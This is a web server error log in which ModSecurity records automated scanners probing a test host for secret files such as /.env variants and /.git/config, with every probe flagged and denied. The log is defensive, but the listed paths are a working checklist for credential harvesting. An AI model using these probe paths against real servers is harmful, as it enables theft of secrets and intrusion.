[Sat Feb 22 09:48:22.624618 2025] [:error] [pid 1324872] [client 45.148.10.166:3822] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7mPVvb1EHGQ3bZwEhJWqQAAAEs"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.625062 2025] [:error] [pid 1324872] [client 45.148.10.166:3822] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7mPVvb1EHGQ3bZwEhJWqQAAAEs"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.804565 2025] [:error] [pid 1324878] [client 45.148.10.166:3836] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7mPVpCEpSQB_HZ02bvHBQAAAFE"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.805771 2025] [:error] [pid 1324878] [client 45.148.10.166:3836] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7mPVpCEpSQB_HZ02bvHBQAAAFE"], referer: https://www.google.com/
[Sat Feb 22 09:48:22.806223 2025] [:error] [pid 1324878] [client 45.148.10.166:3836] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7mPVpCEpSQB_HZ02bvHBQAAAFE"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.038085 2025] [:error] [pid 1324770] [client 45.148.10.166:3838] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7mPV010iGF_xgbBjepvvgAAAAI"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.039684 2025] [:error] [pid 1324770] [client 45.148.10.166:3838] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7mPV010iGF_xgbBjepvvgAAAAI"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.040263 2025] [:error] [pid 1324770] [client 45.148.10.166:3838] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7mPV010iGF_xgbBjepvvgAAAAI"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.226756 2025] [:error] [pid 1324876] [client 45.148.10.166:3844] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7mPVy0lx6EHu5d66nqpOgAAAE8"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.227688 2025] [:error] [pid 1324876] [client 45.148.10.166:3844] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7mPVy0lx6EHu5d66nqpOgAAAE8"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.228138 2025] [:error] [pid 1324876] [client 45.148.10.166:3844] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7mPVy0lx6EHu5d66nqpOgAAAE8"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.367831 2025] [authz_core:error] [pid 1324801] [client 45.148.10.166:3860] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env, referer: https://www.google.com/
[Sat Feb 22 09:48:23.496328 2025] [:error] [pid 1324875] [client 45.148.10.166:3868] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7mPV4XfBZocK-8lZnXd-gAAAE4"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.497262 2025] [:error] [pid 1324875] [client 45.148.10.166:3868] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7mPV4XfBZocK-8lZnXd-gAAAE4"], referer: https://www.google.com/
[Sat Feb 22 09:48:23.497717 2025] [:error] [pid 1324875] [client 45.148.10.166:3868] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7mPV4XfBZocK-8lZnXd-gAAAE4"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.053552 2025] [:error] [pid 1324877] [client 45.148.10.166:3902] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7mPWPEC0wnK7F1RxU-H_AAAAFA"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.054541 2025] [:error] [pid 1324877] [client 45.148.10.166:3902] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7mPWPEC0wnK7F1RxU-H_AAAAFA"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.055009 2025] [:error] [pid 1324877] [client 45.148.10.166:3902] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7mPWPEC0wnK7F1RxU-H_AAAAFA"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.210537 2025] [:error] [pid 1324879] [client 45.148.10.166:3914] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7mPWHzwg1sUFvYIvKHPAQAAAFI"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.212100 2025] [:error] [pid 1324879] [client 45.148.10.166:3914] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7mPWHzwg1sUFvYIvKHPAQAAAFI"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.212639 2025] [:error] [pid 1324879] [client 45.148.10.166:3914] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7mPWHzwg1sUFvYIvKHPAQAAAFI"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.335949 2025] [:error] [pid 1324872] [client 45.148.10.166:3924] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7mPWPb1EHGQ3bZwEhJWqgAAAEs"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.336893 2025] [:error] [pid 1324872] [client 45.148.10.166:3924] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7mPWPb1EHGQ3bZwEhJWqgAAAEs"], referer: https://www.google.com/
[Sat Feb 22 09:48:24.337322 2025] [:error] [pid 1324872] [client 45.148.10.166:3924] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "Z7mPWPb1EHGQ3bZwEhJWqgAAAEs"], referer: https://www.google.com/
[Thu Feb 27 16:38:21.659497 2025] [:error] [pid 1444806] [client 18.133.175.70:51794] [client 18.133.175.70] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8CG7fHy0mwrVDgsmeskFAAAAAE"]
[Thu Feb 27 16:38:21.662130 2025] [:error] [pid 1444806] [client 18.133.175.70:51794] [client 18.133.175.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8CG7fHy0mwrVDgsmeskFAAAAAE"]
[Thu Feb 27 16:38:21.662712 2025] [:error] [pid 1444806] [client 18.133.175.70:51794] [client 18.133.175.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z8CG7fHy0mwrVDgsmeskFAAAAAE"]
[Sun Mar 09 19:17:27.406119 2025] [:error] [pid 1661335] [client 45.148.10.237:48218] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bNxEUyzvDVC1ZEqXbbAAAAAY"]
[Sun Mar 09 19:17:27.409829 2025] [:error] [pid 1661335] [client 45.148.10.237:48218] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bNxEUyzvDVC1ZEqXbbAAAAAY"]
[Sun Mar 09 19:17:27.410286 2025] [:error] [pid 1661335] [client 45.148.10.237:48218] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z83bNxEUyzvDVC1ZEqXbbAAAAAY"]
[Sun Mar 09 19:17:27.587576 2025] [:error] [pid 1661008] [client 45.148.10.237:48252] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bNzV71pfFolEauGOlOwAAAAA"]
[Sun Mar 09 19:17:27.588145 2025] [:error] [pid 1661008] [client 45.148.10.237:48252] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bNzV71pfFolEauGOlOwAAAAA"]
[Sun Mar 09 19:17:27.588575 2025] [:error] [pid 1661008] [client 45.148.10.237:48252] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z83bNzV71pfFolEauGOlOwAAAAA"]
[Sun Mar 09 19:17:28.183518 2025] [:error] [pid 1661008] [client 45.148.10.237:48462] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bODV71pfFolEauGOlPQAAAAA"]
[Sun Mar 09 19:17:28.183774 2025] [:error] [pid 1661008] [client 45.148.10.237:48462] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bODV71pfFolEauGOlPQAAAAA"]
[Sun Mar 09 19:17:28.183940 2025] [:error] [pid 1661008] [client 45.148.10.237:48462] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z83bODV71pfFolEauGOlPQAAAAA"]
[Sun Mar 09 19:17:28.273274 2025] [:error] [pid 1661338] [client 45.148.10.237:48526] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bODEULeXBn1nuAGnm1AAAAAk"]
[Sun Mar 09 19:17:28.273514 2025] [:error] [pid 1661338] [client 45.148.10.237:48526] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bODEULeXBn1nuAGnm1AAAAAk"]
[Sun Mar 09 19:17:28.273678 2025] [:error] [pid 1661338] [client 45.148.10.237:48526] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z83bODEULeXBn1nuAGnm1AAAAAk"]
[Sun Mar 09 19:17:28.372733 2025] [:error] [pid 1661335] [client 45.148.10.237:48550] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOBEUyzvDVC1ZEqXbbwAAAAY"]
